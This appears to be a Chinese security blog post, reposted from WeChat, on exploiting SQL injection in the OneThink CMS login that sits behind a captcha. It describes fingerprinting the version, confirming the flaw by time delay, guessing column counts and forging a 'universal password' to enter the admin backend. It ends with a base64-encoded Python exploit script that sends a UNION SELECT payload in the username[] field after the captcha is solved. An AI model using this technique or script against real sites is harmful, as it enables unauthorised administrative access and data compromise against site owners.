凡是过往,皆为序章,凡是未来,皆有可期
这个注入有点坑人(注入在图形验证码后面,需要先验证图形验证码是否正确,然后执行SQL语句),正常来说,如果是用自动化的扫描工具,很难检测到,又是一个小技巧.jpg
但是某种程度上来说没得价值,属于及其难以利用的那种,但是遇到的次数比较多,并且有大佬另辟蹊径,给出了万能密码的利用方式,就记录一下。
页面报错如果版本为1.0.131218,九成是onethink,如下图:
利用的话,首先看一下有无延时,若延时即存在漏洞,可以慢慢猜列数(碰到最多就13列,少的就10列),构造万能密码,进入系统后台
这里用的利用脚本,自动识别图形验证码(但是手动输入,悲):
接下来,用这个cookie就可以正常登录了
写在最后,我知道,肯定有人当伸手党。
但是懒得玩惯有套路,所以我留下了一段代码,相当Easy的啊:
YVcxd2IzSjBJSFJvY21WaFpHbHVadzBLYVcxd2IzSjBJSEpsY1hWbGMzUnpEUXBwYlhCdmNuUWdhbk52YmcwS2FXMXdiM0owSUhWeWJHeHBZZzBLYVcxd2IzSjBJRzFoZEhCc2IzUnNhV0l1Y0hsd2JHOTBJR0Z6SUhCc2RBMEthVzF3YjNKMElHcHpiMjROQ2cwS0krYXpxT2FFaithYnYrYU5vblZ5Yk9XY3NPV2RnT1M0dXVlYnJ1YWdoK1djc09XZGdBMEtkWEpzSUQwZ0ltaDBkSEJ6T2k4dmQzZDNMbVY0WVcxd2JHVXVZMjl0SWcwS2VYcHRJRDBnSWk5cGJtUmxlQzV3YUhBL2N6MHZRV1J0YVc0dlVIVmliR2xqTDNabGNtbG1lUzVvZEcxc0lnMEtiRzluYVc0Z1BTQWlMMmx1WkdWNExuQm9jRDl6UFM5QlpHMXBiaTlRZFdKc2FXTXZiRzluYVc0dWFIUnRiQ0lOQ2cwS2N5QTlJSEpsY1hWbGMzUnpMbk5sYzNOcGIyNG9LUTBLZVhwdFgybHRaeUE5SUhNdVoyVjBLSFZ5YkNBcklIbDZiU3dnZG1WeWFXWjVQVVpoYkhObEtTNWpiMjUwWlc1MERRcHdjbWx1ZENoekxtTnZiMnRwWlhNcERRcG9aV0ZrWlhKeklEMGdleUpZTFZKbGNYVmxjM1JsWkMxWGFYUm9Jam9nSWxoTlRFaDBkSEJTWlhGMVpYTjBJbjBOQ2cwS2QybDBhQ0J2Y0dWdUtDSjVlbTB1Y0c1bklpd2lkMklpS1NCaGN5Qm1PZzBLSUNBZ0lHWXVkM0pwZEdVb2VYcHRYMmx0WnlrTkNnMEtaR1ZtSUhOb2IzZGZlWHB0S0NrNkRRb2dJQ0FnZVhwdFgybHRaeUE5SUhCc2RDNXBiWEpsWVdRb0ozbDZiUzV3Ym1jbktRMEtJQ0FnSUhCc2RDNXBiWE5vYjNjb2VYcHRYMmx0WnlrTkNpQWdJQ0J3YkhRdWMyaHZkeWdwRFFvTkNuUWdQU0IwYUhKbFlXUnBibWN1VkdoeVpXRmtLSFJoY21kbGREMXphRzkzWDNsNmJTa05DblF1YzNSaGNuUW9LUTBLRFFwNWVtMGdQU0JwYm5CMWRDZ2k2TDZUNVlXbDU1eUw1WWl3NTVxRTZhcU02SytCNTZDQjc3eWFJaWtOQ2cwS2NHOXpkR1JoZEdFZ1BTQW9EUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdLQ2QxYzJWeWJtRnRaVnRkSnl3bmJHbHJaU0F4S1dGdVpDQXhJR2x1SUNneUtTQjFibWx2YmlCelpXeGxZM1FnTVN3eUxDSWlMRFFzTlN3MkxEY3NPQ3c1TERFd0xERXhMREV5SXljcExDQWdJQ05sZUhCc2IybDBEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJeWduZFhObGNtNWhiV1ZiWFNjc0oyeHBhMlVnTVNsaGJtUWdNU0JwYmlBb01pa2diM0lnYzJ4bFpYQW9OU2tqSnlrc0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJMk5vWldOckRRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0tDZDFjMlZ5Ym1GdFpWdGRKeXd3S1N3TkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBb0ozQmhjM04zYjNKa0p5d25KeWtzRFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnS0NkMlpYSnBabmtuTEhsNmJTa05DaUFnSUNBZ0lDQWdJQ0FnSUNrTkNnMEtjaUE5SUhNdWNHOXpkQ2gxY213Z0t5QnNiMmRwYml4b1pXRmtaWEp6UFdobFlXUmxjbk1zWkdGMFlUMXdiM04wWkdGMFlTd2dkbVZ5YVdaNVBVWmhiSE5sS1EwS0RRb2pjSEpwYm5Rb2NpNTBaWGgwS1EwS2NISnBiblFvYW5OdmJpNXNiMkZrY3loeUxuUmxlSFF1Wlc1amIyUmxLQ2t1WkdWamIyUmxLQ2QxYm1samIyUmxYMlZ6WTJGd1pTY3BLU2tOQ2c9PQ==那么就这样吧。
原文始发于微信公众号(JC的安全之路):谈谈关于onethink注入的一点小技巧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论